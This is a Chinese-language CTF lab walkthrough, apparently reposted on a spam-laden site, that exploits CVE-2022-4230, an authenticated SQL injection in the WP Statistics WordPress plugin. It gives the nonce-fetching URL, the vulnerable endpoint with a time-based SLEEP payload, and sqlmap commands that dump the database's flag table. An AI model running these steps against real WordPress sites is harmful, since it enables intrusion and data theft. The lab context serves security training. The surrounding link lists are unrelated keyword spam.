当前位置: 首页 > news >正文

网站开发建设挣钱吗短视频广告投放平台

网站开发建设挣钱吗,短视频广告投放平台,wordpress标签模板下载,ico交易网站怎么做目录 靶标介绍 开启靶场 wpscan漏洞介绍 查询数据库表名 查询表中字段名 查询字段下数据 靶标介绍 WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (ad…

目录

靶标介绍

开启靶场

wpscan漏洞介绍

查询数据库表名

查询表中字段名

查询字段下数据


靶标介绍

WP Statistics WordPress 插件13.2.9之前的版本不会转义参数,这可能允许经过身份验证的用户执行 SQL 注入攻击。默认情况下,具有管理选项功能 (admin+) 的用户可以使用受影响的功能,但是该插件有一个设置允许低权限用户也可以访问它。

开启靶场

开启靶场之后,发现什么都没有,所以我们进行目录扫描,这里我使用的是御剑目录扫描工具

访问 license.txt 无收获,访问 resdme.html 发现以下页面

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/readme.html

点击 login page,发现了一个登录页面

试了用户名和密码是 admin 之后并无发现,左下角有一个“返回到 test”,说明 test 大概率是用户,尝试登录一下

发现登录成功了

wpscan漏洞介绍

根据靶标介绍,这里有插件漏洞,链接:WP Statistics < 13.2.9 – 经过身份验证的 SQLi |CVE 2022-4230 |插件漏洞 (wpscan.com),有兴趣可以了解下

意思大概是这样的:以允许查看WP统计信息的用户身份登录,并通过获取随机数“https://xxx.com/wp-admin/admin-ajax.php?action=rest-nonce”,并在下面的URL中使用它,该URL将延迟5s

首先通过访问,获得随机数(必须要先登录过后台才行)

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-admin/admin-ajax.php?action=rest-nonce

获得随机数之后,把随机数添加到下面那个 URL 中,访问一下试试,这里就不加“%27%20AND%20(SELECT%205671%20FROM%20(SELECT(SLEEP(5)))Mdgs)--%20HsBR”了,不加这条语句不影响最终结果

http://eci-2zejepxupyfau8prrjw3.cloudeci1.ichunqiu.com/wp-json/wp-statistics/v2/metabox?_wpnonce=16139d290f&name=words&search_engine=aaa

访问之后发现了这个页面,然后用 Burp 抓个包吧

把数据包复制到一个文本里,重命名为 test.txt 拖进 kali 桌面,在桌面打开终端使用 sqlmap 工具跑一下

sqlmap -r test.txt --batch --dbs

发现了 wordpress 敏感数据库

查询数据库表名

sqlmap -r test.txt --batch -D wordpress --tables

发现了一个 flag 表

查询表中字段名

sqlmap -r test.txt --batch -D wordpress -T flag --columns

发现字段名是 flag

查询字段下数据

sqlmap -r test.txt --batch -D wordpress -T flag -C flag --dump

发现了 flag

http://www.15wanjia.com/news/45544.html

相关文章:

  • 做企业网站收费竞价排名采用什么计费方式
  • 做机械设计的要知道哪些网站营销策划方案
  • 一个网站只有一个核心关键词品牌咨询
  • 文档下载免费网站网站制作费用一览表
  • 网站维护 费用网络营销就是
  • 中山建设局网站首页厦门百度关键词seo收费
  • 植树节ppt模板下载免费版百度seo2022
  • 软件开发流程简介厦门站长优化工具
  • 视频链接怎么制作石家庄seo扣费
  • 企业静态网站模板网络营销的基本功能
  • 品牌商城网站建设网址收录查询
  • 有哪些可以做威客的网站宣传软文
  • 高端网站开发有哪些病毒式营销案例
  • 商务网站建设的一般流程是什么西安seo外包平台
  • 机械网站建设哪家好黑帽seo培训大神
  • 人家做网站是什么优化师是做什么的
  • wordpress子插件株洲seo快速排名
  • html5网站赏析推广seo公司
  • 做界面网站用什么语言好百度怎么收录自己的网站
  • 网站建设的上市公司新东方托福班价目表
  • 上海正规做网站公司电话地推团队联系方式
  • 商品数据包网站开发windows优化大师卸载不掉
  • 怎么做网站公众号深圳短视频推广
  • 建设网站应该注意些什么软文营销平台
  • 详情页设计风格湖南seo网站多少钱
  • 企业建设网站的步骤是什么意思湖南seo排名
  • 企业网站建设规划设计任务书单页网站制作教程
  • 贵阳高端网站建设广告推销网站
  • 医疗医院网站建设网站设计与建设
  • 备案网站名怎么填写网站优化seo方案